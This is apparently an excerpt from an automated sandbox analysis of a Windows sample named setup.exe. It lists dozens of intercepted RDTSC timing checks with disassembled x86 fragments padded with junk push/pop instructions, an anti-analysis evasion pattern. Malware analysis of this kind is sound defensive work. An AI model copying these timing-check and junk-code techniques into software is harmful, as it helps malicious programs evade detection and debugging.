Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E2EA second address: 46E2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E2EE second address: 46E2F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E2F2 second address: 46E2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E2FD second address: 46E306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E306 second address: 46E30C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E30C second address: 46E324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47CD34661Ah 0x0000000d jbe 00007F47CD346616h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E324 second address: 46E328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46E4B0 second address: 46E4B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46EA74 second address: 46EA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47CD361206h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46EA85 second address: 46EA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD34661Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46EA95 second address: 46EAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F47CD36120Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4713A7 second address: 4713C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346628h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4713C3 second address: 4713E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d push ecx 0x0000000e jg 00007F47CD361206h 0x00000014 pop ecx 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 jc 00007F47CD361210h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471447 second address: 471466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F47CD346616h 0x00000009 jmp 00007F47CD34661Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471466 second address: 47146C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47146C second address: 471471 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471471 second address: 4714CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F47CD361208h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F47CD361208h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 adc dl, FFFFFFFBh 0x00000043 push 1C79DD2Fh 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4714CE second address: 4714D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4714D4 second address: 4714D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4715FF second address: 471604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471604 second address: 471609 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471653 second address: 471712 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F47CD346618h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b ja 00007F47CD346632h 0x00000011 nop 0x00000012 mov dx, ax 0x00000015 push 00000000h 0x00000017 mov esi, ebx 0x00000019 push E648A111h 0x0000001e jnp 00007F47CD346622h 0x00000024 jo 00007F47CD34661Ch 0x0000002a jp 00007F47CD346616h 0x00000030 add dword ptr [esp], 19B75F6Fh 0x00000037 mov edi, dword ptr [ebp+122D2C89h] 0x0000003d push 00000003h 0x0000003f jmp 00007F47CD346628h 0x00000044 push 00000000h 0x00000046 mov si, 34B4h 0x0000004a push 00000003h 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007F47CD346618h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000019h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 mov edx, eax 0x00000068 call 00007F47CD346619h 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F47CD346622h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471712 second address: 47172F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47172F second address: 471753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F47CD346616h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F47CD34661Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007F47CD346616h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471753 second address: 471757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471757 second address: 47178C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007F47CD346620h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F47CD346626h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47178C second address: 4717C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F47CD36120Eh 0x00000014 jmp 00007F47CD36120Dh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4717C8 second address: 471829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F47CD346618h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 lea ebx, dword ptr [ebp+1245C292h] 0x0000002b mov edx, dword ptr [ebp+122D2D65h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F47CD346622h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471829 second address: 471833 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471833 second address: 47183D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471891 second address: 47189C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47CD361206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47189C second address: 4718A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48358F second address: 4835A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F47CD361210h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4835A8 second address: 4835B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F47CD346616h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4907EC second address: 4907FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F47CD361206h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4907FC second address: 490814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490814 second address: 490818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490818 second address: 490824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490824 second address: 490828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490828 second address: 49084E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F47CD346629h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49084E second address: 49085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4909F2 second address: 490A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD34661Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490A03 second address: 490A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47CD36120Ah 0x0000000d jmp 00007F47CD361211h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490A26 second address: 490A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490B91 second address: 490BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F47CD36120Ah 0x0000000c jno 00007F47CD36120Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490BB1 second address: 490BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490BB5 second address: 490BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490FC3 second address: 490FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346626h 0x00000009 jng 00007F47CD346616h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 491438 second address: 49144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 491A32 second address: 491A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F47CD346621h 0x00000008 jmp 00007F47CD346628h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F47CD346623h 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49200F second address: 492013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492013 second address: 492021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F47CD346616h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492021 second address: 492025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492170 second address: 49217A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49217A second address: 492192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361214h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492192 second address: 49219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49269F second address: 4926A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4926A3 second address: 4926AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F47CD346616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4926AF second address: 4926B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4968C7 second address: 4968CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 497123 second address: 497127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 497127 second address: 49712D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 498192 second address: 49819C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46313A second address: 463144 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 469D0F second address: 469D15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 469D15 second address: 469D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F47CD346616h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49CC58 second address: 49CC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49CC5F second address: 49CC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49D27A second address: 49D288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49D417 second address: 49D41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0CFF second address: 4A0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F47CD361206h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0EB1 second address: 4A0EB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0EB7 second address: 4A0EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0EBD second address: 4A0EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A13FA second address: 4A1400 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1400 second address: 4A140A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47CD34661Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1A9D second address: 4A1AEB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD361208h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jc 00007F47CD361206h 0x00000013 js 00007F47CD361206h 0x00000019 popad 0x0000001a pop ebx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F47CD361208h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 and si, 5FF7h 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1AEB second address: 4A1AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1AF8 second address: 4A1AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1AFC second address: 4A1B06 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1B06 second address: 4A1B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A28DE second address: 4A293C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D18C1h], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F47CD346618h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b movsx edi, dx 0x0000002e push 00000000h 0x00000030 jmp 00007F47CD34661Eh 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a pop edx 0x0000003b jmp 00007F47CD346621h 0x00000040 popad 0x00000041 push eax 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A3A70 second address: 4A3A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F47CD361206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A311A second address: 4A312B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A43D7 second address: 4A43DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A4F3C second address: 4A4F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A51F1 second address: 4A51F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A73D7 second address: 4A73DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A714A second address: 4A7158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 je 00007F47CD36120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A7C05 second address: 4A7C2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47CD346618h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F47CD346625h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A8DFA second address: 4A8DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
